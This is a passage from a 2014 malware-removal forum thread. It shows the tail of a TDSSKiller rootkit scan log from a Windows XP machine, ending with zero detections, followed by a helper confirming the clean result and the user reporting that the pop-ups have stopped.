13:18:46.0437 0x020c  [ 2D0E4ED081963804CCC196A0929275B5, E1D75C7D7233D81DFDE13160B0C80138DF8B35230D04FB79B367A52FACF69BF8 ] winmgmt         C:\WINDOWS\system32\wbem\WMIsvc.dll
13:18:46.0578 0x020c  winmgmt - ok
13:18:46.0718 0x020c  [ 5144AE67D60EC653F97DDF3FEED29E77, F6238767284B2356A9F502E2ACCFAAC283FA13CBF238E98B5115A55179526B10 ] wlidsvc         C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
13:18:46.0781 0x020c  wlidsvc - ok
13:18:46.0812 0x020c  [ C51B4A5C05A5475708E3C81C7765B71D, F776D2680BD3407307B7072626F78460361FC5BC38623C9E16F394D300AB25DE ] WmdmPmSN        C:\WINDOWS\system32\MsPMSNSv.dll
13:18:46.0828 0x020c  WmdmPmSN - ok
13:18:46.0890 0x020c  [ E76F8807070ED04E7408A86D6D3A6137, BFCF5361B7335760A7AE4B6958DE516A27AC60AA09135A46F0B49F588FAFE3A0 ] Wmi             C:\WINDOWS\System32\advapi32.dll
13:18:46.0968 0x020c  Wmi - ok
13:18:47.0015 0x020c  [ E0673F1106E62A68D2257E376079F821, 12992F18C9653050B10DC61D12988067933FCFDF02123D3A7EF5DE607A785DDC ] WmiApSrv        C:\WINDOWS\system32\wbem\wmiapsrv.exe
13:18:47.0187 0x020c  WmiApSrv - ok
13:18:47.0296 0x020c  [ F74E3D9A7FA9556C3BBB14D4E5E63D3B, C71FAAC752F6D58BF8556661252DBF8C5DDD090CAE002A2C7E09C9A014526066 ] WMPNetworkSvc   C:\Program Files\Windows Media Player\WMPNetwk.exe
13:18:47.0359 0x020c  WMPNetworkSvc - ok
13:18:47.0375 0x020c  [ CF4DEF1BF66F06964DC0D91844239104, CC1D9CECE2056D29A9651D51BB57C3F4F9BF9E90A4808CF7496C683C874FBD51 ] WpdUsb          C:\WINDOWS\system32\DRIVERS\wpdusb.sys
13:18:47.0390 0x020c  WpdUsb - ok
13:18:47.0515 0x020c  [ 15673BD0B86150CB8E27766059C72A9B, 56C23289A8BFF4945EE532CF6D62D3EC81B827CA15A359F30A327789F9FE9CAF ] WPFFontCache_v0400 C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\WPF\WPFFontCache_v0400.exe
13:18:47.0562 0x020c  WPFFontCache_v0400 - ok
13:18:47.0593 0x020c  [ 6ABE6E225ADB5A751622A9CC3BC19CE8, 4061C5D0F051DFF1730E2A3BFC1CCA97B29602FC50F10F6B44D93B0D28F42024 ] WS2IFSL         C:\WINDOWS\System32\drivers\ws2ifsl.sys
13:18:47.0750 0x020c  WS2IFSL - ok
13:18:47.0781 0x020c  [ 7C278E6408D1DCE642230C0585A854D5, DA46079A04F6E8E3441E4AE454AEAC02B3E935DE29CE7F6D4476F57867FCC12A ] wscsvc          C:\WINDOWS\system32\wscsvc.dll
13:18:47.0953 0x020c  wscsvc - ok
13:18:47.0984 0x020c  [ 35321FB577CDC98CE3EB3A3EB9E4610A, C9A6F5CF282D8FCB3CDFCC4B306013480E78E1B664E1A60A4E27B161F9FFD4CD ] wuauserv        C:\WINDOWS\system32\wuauserv.dll
13:18:48.0140 0x020c  wuauserv - ok
13:18:48.0171 0x020c  [ F15FEAFFFBB3644CCC80C5DA584E6311, 79B3E9AF35976CE49921E9BEA3BA3B4A8AF762FD3F284B62954038B5FFB32471 ] WudfPf          C:\WINDOWS\system32\DRIVERS\WudfPf.sys
13:18:48.0203 0x020c  WudfPf - ok
13:18:48.0234 0x020c  [ 28B524262BCE6DE1F7EF9F510BA3985B, AEFF02B899801A63CBB262757C3D4369E38BFF0690BD085DE60E873DFBE3C3F4 ] WudfRd          C:\WINDOWS\system32\DRIVERS\wudfrd.sys
13:18:48.0281 0x020c  WudfRd - ok
13:18:48.0296 0x020c  [ 05231C04253C5BC30B26CBAAE680ED89, 5C03C2D7E0B573646D32F4093E2FF2C3BA391C39F5BA37D67F69D38E357FCC3D ] WudfSvc         C:\WINDOWS\System32\WUDFSvc.dll
13:18:48.0328 0x020c  WudfSvc - ok
13:18:48.0375 0x020c  [ 81DC3F549F44B1C1FFF022DEC9ECF30B, 3D14BFEA539F9CEB16555BD56C5E3C7C8F6692FC62C2789F8AAEA1C042E63940 ] WZCSVC          C:\WINDOWS\System32\wzcsvc.dll
13:18:48.0546 0x020c  WZCSVC - ok
13:18:48.0578 0x020c  [ 295D21F14C335B53CB8154E5B1F892B9, 9418477C2E3EA93E93D931A4EDD4500DA568FAD6040204B5201D1080203B0BBC ] xmlprov         C:\WINDOWS\System32\xmlprov.dll
13:18:48.0734 0x020c  xmlprov - ok
13:18:48.0781 0x020c  [ 518C4D4DCB93C88316303694163BBD63, 93865CC9AEFEF2DD0E8025EE283AC57773EF13D38E03B73FBCE22FAB9D77D2AE ] yukonwxp        C:\WINDOWS\system32\DRIVERS\yk51x86.sys
13:18:48.0828 0x020c  yukonwxp - ok
13:18:48.0875 0x020c  [ 478B4415DFB3A45B6FE61EC781E07D7B, C48BFA226F594E4BFB722056C8EF9CCBB27504F181781284AE7151D2CDAF50DE ] ZD1211BU(ZyDAS) C:\WINDOWS\system32\DRIVERS\zd1211Bu.sys
13:18:48.0937 0x020c  ZD1211BU(ZyDAS) - ok
13:18:48.0968 0x020c  [ 3C185892DD5C13975966E8D1C2A65290, 665A4B5AC61A76A6E72B6C87ECE902617E8A03DD1E63418CF15EA988FDBD5B44 ] ZD1211U(ZyDAS)  C:\WINDOWS\system32\DRIVERS\zd1211u.sys
13:18:49.0015 0x020c  ZD1211U(ZyDAS) - ok
13:18:49.0031 0x020c  [ 00AE175B903D45ED4A62384D3315DC2A, FAAAD00B96DDCDEB396D479F89207A0EEC374871C6340AACDDB95BF289D6330C ] ZDPSp50         C:\WINDOWS\system32\Drivers\ZDPSp50.sys
13:18:49.0031 0x020c  ZDPSp50 - detected UnsignedFile.Multi.Generic ( 1 )
13:18:49.0031 0x020c  Detect skipped due to KSN trusted
13:18:49.0031 0x020c  ZDPSp50 - ok
13:18:49.0031 0x020c  ================ Scan global ===============================
13:18:49.0062 0x020c  [ 42F1F4C0AFB08410E5F02D4B13EBB623, 924C30587C51C0D1E1F47991969AF492A644552E15F2480EA991DCB74A3E68D5 ] C:\WINDOWS\system32\basesrv.dll
13:18:49.0125 0x020c  [ 69AE2B2E6968C316536E5B10B9702E63, D9C5DA7A20DDE69D91E72400C3F06F3CB099DEF42EA6C53FCE076258A0C22391 ] C:\WINDOWS\system32\winsrv.dll
13:18:49.0140 0x020c  [ 69AE2B2E6968C316536E5B10B9702E63, D9C5DA7A20DDE69D91E72400C3F06F3CB099DEF42EA6C53FCE076258A0C22391 ] C:\WINDOWS\system32\winsrv.dll
13:18:49.0171 0x020c  [ 65DF52F5B8B6E9BBD183505225C37315, 59C606977DB40A3443DFF0BE2A4C761824881B22C9FDB3D23F6486DB580E92A4 ] C:\WINDOWS\system32\services.exe
13:18:49.0171 0x020c  [ Global ] - ok
13:18:49.0171 0x020c  ================ Scan MBR ==================================
13:18:49.0187 0x020c  [ 99852D5C3A78447C3D6D82B6155FE848 ] \Device\Harddisk0\DR0
13:18:52.0125 0x020c  \Device\Harddisk0\DR0 - ok
13:18:52.0125 0x020c  ================ Scan VBR ==================================
13:18:52.0140 0x020c  [ BA29F0665A0180B8388AD44A01EA69CE ] \Device\Harddisk0\DR0\Partition1
13:18:52.0171 0x020c  \Device\Harddisk0\DR0\Partition1 - ok
13:18:52.0187 0x020c  [ EF7C7D20C938BDEB2E5C23C206B5B61F ] \Device\Harddisk0\DR0\Partition2
13:18:52.0187 0x020c  \Device\Harddisk0\DR0\Partition2 - ok
13:18:52.0187 0x020c  ================ Scan generic autorun ======================
13:18:52.0203 0x020c  LaunchApp - ok
13:18:52.0890 0x020c  [ 1674E54E4AB3D492C648AA43F731A540, D140986EB98342D75E693F0D05ADAB672DF9553593A97B9455C6407142672B41 ] C:\WINDOWS\RTHDCPL.EXE
13:18:53.0640 0x020c  RTHDCPL - ok
13:18:53.0843 0x020c  [ C74B86642F131D76C0EDE673FDF137B2, 91659969CF94979FA980A3C13AB3E7421048E4E2720DE6064E9B61FD4DF96666 ] C:\WINDOWS\SkyTel.EXE
13:18:54.0015 0x020c  SkyTel - ok
13:18:54.0093 0x020c  [ 27ECDC43B2E41A865092CC31263358F2, 3956B6E4EC45C37D47E9FF7382984B806691B9407E59A6377C51B05E5A6BE83D ] c:\Program Files\NewTech Infosystems\NTI CD & DVD-Maker 7\ntiMUI.exe
13:18:54.0125 0x020c  ntiMUI - detected UnsignedFile.Multi.Generic ( 1 )
13:18:54.0125 0x020c  Detect skipped due to KSN trusted
13:18:54.0125 0x020c  ntiMUI - ok
13:18:54.0156 0x020c  [ 8FB740D758B14B1BC950CC347C21E461, 6EAB429DE35D87C94E9B912E189C248428653674939352E0210FC026F5A4B564 ] C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe
13:18:54.0156 0x020c  RemoteControl - detected UnsignedFile.Multi.Generic ( 1 )
13:18:54.0156 0x020c  Detect skipped due to KSN trusted
13:18:54.0156 0x020c  RemoteControl - ok
13:18:54.0203 0x020c  [ 7BBE4CF421AECC7F0226EDD75F12079F, 8E78FC5E0657DB066F9EBAADEA9AFECB1AAA570DD9C08C7ED42116704D2E379D ] C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE
13:18:54.0359 0x020c  IMJPMIG8.1 - ok
13:18:54.0375 0x020c  [ E6BB63BBE1BED01769CA87F4DAC286C8, 6D1D7C7365FBF29C92398BC11D5713BC373E372D92C155DA0DBA3B86DD1705F7 ] C:\WINDOWS\ime\imkr6_1\IMEKRMIG.EXE
13:18:54.0531 0x020c  IMEKRMIG6.1 - ok
13:18:54.0562 0x020c  [ 1B17E09C1223F6D17336D2DD7A1AF4F4, 06DFAD95007532CCF46D593EEDC2474936614AEDCEA7BF983E36DAD22F850B08 ] C:\WINDOWS\system32\IME\PINTLGNT\ImScInst.exe
13:18:54.0718 0x020c  MSPY2002 - ok
13:18:54.0765 0x020c  [ 024DC0F68DF5FD6AE9DD82DFBAF479D6, FDBF0FD05CFB757C704B22703DF23E05207F14877A4EF52E3032012B6FD0C4E0 ] C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE
13:18:54.0906 0x020c  PHIME2002ASync - ok
13:18:54.0921 0x020c  [ 024DC0F68DF5FD6AE9DD82DFBAF479D6, FDBF0FD05CFB757C704B22703DF23E05207F14877A4EF52E3032012B6FD0C4E0 ] C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE
13:18:55.0062 0x020c  PHIME2002A - ok
13:18:55.0093 0x020c  [ 3F5B5C05BA8002D171B482066CEDFE75, DDAC7B13387AC6729136315A30467FF6B3D94CF71CF91E7D53B70660028B0782 ] C:\WINDOWS\system32\igfxtray.exe
13:18:55.0140 0x020c  IgfxTray - ok
13:18:55.0156 0x020c  [ 71E7AC7708BDFF5FFA0FA33D38220195, F11CF440DFBC1573FA05959B3F727CE1AF721DC98333996BB777FC7CEB166FF9 ] C:\WINDOWS\system32\hkcmd.exe
13:18:55.0187 0x020c  HotKeysCmds - ok
13:18:55.0218 0x020c  [ 63678F54E6EFB60010C073E3979080E9, 7403D83F99F9F8F77BDF9FC925F48BCD407860BF11FED8872F9F9B42BB531B8C ] C:\WINDOWS\system32\igfxpers.exe
13:18:55.0265 0x020c  Persistence - ok
13:18:55.0343 0x020c  [ 72D78BD9AB1F457502F01832B07133CF, 28B63273420234F4349E23DCEDC5F80E9BAB307C08F39016E92DA7BCA411955E ] C:\Acer\Empowering Technology\eDataSecurity\eDSloader.exe
13:18:55.0406 0x020c  eDataSecurity Loader - detected UnsignedFile.Multi.Generic ( 1 )
13:18:55.0406 0x020c  Detect skipped due to KSN trusted
13:18:55.0406 0x020c  eDataSecurity Loader - ok
13:18:55.0453 0x020c  [ C67E00C1DCA52FB369DC54E9EE653D47, 5D6C19CFFCB221FEFA60870E1520DF035DD4433D0B5DEC505EBBC01D5EE6AD0D ] C:\Acer\Empowering Technology\eRecovery\eRAgent.exe
13:18:55.0500 0x020c  eRecoveryService - detected UnsignedFile.Multi.Generic ( 1 )
13:18:55.0500 0x020c  Detect skipped due to KSN trusted
13:18:55.0500 0x020c  eRecoveryService - ok
13:18:55.0562 0x020c  [ 2E73DF74A297EE6B91C4F57B9BD84317, 6B8BC16820071A7F54228792E075730E2E17043530CB62DCD2BCCC86D6011D29 ] C:\Program Files\Qwest\QuickCare\bin\sprtcmd.exe
13:18:55.0562 0x020c  Suspicious file ( NoAccess ): C:\Program Files\Qwest\QuickCare\bin\sprtcmd.exe. md5: 2E73DF74A297EE6B91C4F57B9BD84317, sha256: 6B8BC16820071A7F54228792E075730E2E17043530CB62DCD2BCCC86D6011D29
13:18:55.0562 0x020c  QuickCare2.2 - detected LockedFile.Multi.Generic ( 1 )
13:18:55.0562 0x020c  Detect skipped due to KSN trusted
13:18:55.0562 0x020c  QuickCare2.2 - ok
13:18:55.0656 0x020c  [ D5E719C1ED306EC0E65E2E71638CC40A, 102AB96AD06F62BA110568F0E5179AB7D5D1B0AE4DA4A3549F64CFA9DE5FD2A4 ] C:\Program Files\Amazon\Amazon Games & Software Downloader\AmazonGSDownloaderTray.exe
13:18:55.0687 0x020c  AmazonGSDownloaderTray - detected UnsignedFile.Multi.Generic ( 1 )
13:18:55.0687 0x020c  Detect skipped due to KSN trusted
13:18:55.0687 0x020c  AmazonGSDownloaderTray - ok
13:18:55.0750 0x020c  [ D2DAD71C96C113ED07F7BB79AD831C28, 8EACE797C16663D58B8BA67C9BF135780D1676E16797A1E81706263238C7BC0B ] C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe
13:18:55.0765 0x020c  APSDaemon - ok
13:18:55.0828 0x020c  [ 4AFFDCAADCB1DBBFFAF06C7F82E7F6FC, 8BAD14D327C60B4CBC00278802A5F6453D641EFC2EF97D90E7AB579758DF7FFC ] C:\Program Files\iTunes\iTunesHelper.exe
13:18:55.0859 0x020c  iTunesHelper - ok
13:18:55.0906 0x020c  [ 8DDA2B606279753601F9415DA503CA63, 2C9AD8218E150B6D50817991377ED3230A1672EFBD7AE29D0CD9E55E2418C800 ] C:\Program Files\QuickTime\QTTask.exe
13:18:55.0937 0x020c  QuickTime Task - detected UnsignedFile.Multi.Generic ( 1 )
13:18:55.0937 0x020c  Detect skipped due to KSN trusted
13:18:55.0937 0x020c  QuickTime Task - ok
13:18:56.0031 0x020c  [ 048EA4B978851788E9F5E8E4F081DF7A, EB62719AC0DCC18FF056F2CD84438BF14B61E38F0619617C81961C6257BDFCEC ] C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe
13:18:56.0093 0x020c  Adobe ARM - ok
13:18:56.0125 0x020c  [ D63797E8E7781EE1500A810CB6194FA6, 5C96DA00B98F0776E6174EBB7D4D6DB634838E130D8581E11811831D2C57B119 ] C:\Program Files\Common Files\Java\Java Update\jusched.exe
13:18:56.0156 0x020c  SunJavaUpdateSched - ok
13:18:56.0218 0x020c  [ CE5C9977DA751DDC30952AC4DCBCA788, 295172C4681E9AC27121122CDD2BA6F2A62435917A083CC8490D584CA0164BE6 ] C:\Program Files\HP\HP Software Update\HPWuSchd2.exe
13:18:56.0234 0x020c  HP Software Update - ok
13:18:56.0234 0x020c  Malwarebytes Anti-Malware (reboot) - ok
13:18:56.0468 0x020c  [ 6DB4CC46B84D49F675D89BFB0A8CAFC3, 01019410A8AD79AEA059CC31E420E862C180F9A35832B7F396421D07708EC94F ] C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe
13:18:56.0468 0x020c  Suspicious file ( NoAccess ): C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe. md5: 6DB4CC46B84D49F675D89BFB0A8CAFC3, sha256: 01019410A8AD79AEA059CC31E420E862C180F9A35832B7F396421D07708EC94F
13:18:56.0468 0x020c  SUPERAntiSpyware - detected LockedFile.Multi.Generic ( 1 )
13:18:56.0484 0x020c  Detect skipped due to KSN trusted
13:18:56.0484 0x020c  SUPERAntiSpyware - ok
13:18:56.0640 0x020c  [ 1018DE129F3A1D28654FD801D3FCA4E1, 78E913ACF8024F0B75CFF151162F83318BEDBBD43E390A32532E6EF94DA6C3AF ] C:\Documents and Settings\Jay\Application Data\Spotify\Data\SpotifyWebHelper.exe
13:18:56.0734 0x020c  Spotify Web Helper - ok
13:18:56.0781 0x020c  [ 5F1D5F88303D4A4DBC8E5F97BA967CC3, 5FB24FC7916A6E6B3BE7D84CB1684215B266CD1495575C2E5672B8447932E5B1 ] C:\WINDOWS\system32\ctfmon.exe
13:18:56.0937 0x020c  ctfmon.exe - ok
13:18:56.0984 0x020c  swg - ok
13:18:57.0000 0x020c  [ 5F1D5F88303D4A4DBC8E5F97BA967CC3, 5FB24FC7916A6E6B3BE7D84CB1684215B266CD1495575C2E5672B8447932E5B1 ] C:\WINDOWS\system32\ctfmon.exe
13:18:57.0125 0x020c  ctfmon.exe - ok
13:18:57.0250 0x020c  [ 3E930C641079443D4DE036167A69CAA2, DEBA83978850F17B33A3C4C06C5E707B9A3FACA30FE0DFC5A9425EF2CA592473 ] C:\Program Files\Messenger\msmsgs.exe
13:18:57.0500 0x020c  MSMSGS - ok
13:18:57.0515 0x020c  [ 5F1D5F88303D4A4DBC8E5F97BA967CC3, 5FB24FC7916A6E6B3BE7D84CB1684215B266CD1495575C2E5672B8447932E5B1 ] C:\WINDOWS\system32\ctfmon.exe
13:18:57.0640 0x020c  ctfmon.exe - ok
13:18:57.0640 0x020c  swg - ok
13:18:57.0750 0x020c  Win FW state via NFM: disabled
13:19:00.0375 0x020c  ============================================================
13:19:00.0375 0x020c  Scan finished
13:19:00.0375 0x020c  ============================================================
13:19:00.0375 0x0ee8  Detected object count: 0
13:19:00.0375 0x0ee8  Actual detected object count: 0

 

 

 

RG
 



#14 Starbuck

Starbuck

    'r Brudiwr


  • Malware Response Team
  • 4,149 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Midlands, UK
  • Local time:02:24 PM

Posted 23 September 2014 - 05:30 PM

Hi rockgremlin

13:19:00.0375 0x0ee8 Detected object count: 0
13:19:00.0375 0x0ee8 Actual detected object count: 0

That's good..... just what we wanted to see. :)

How's the system running now?

BBPP6nz.png


#15 rockgremlin

rockgremlin
  • Topic Starter

  • Members
  • 8 posts
  • OFFLINE
  •  
  • Local time:02:24 PM

Posted 29 September 2014 - 06:05 PM

Everything's running quite well at present. I haven't seen a popup nor an unwelcome webpage or advertisement for weeks.

 

 

Many, many thanks.






0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users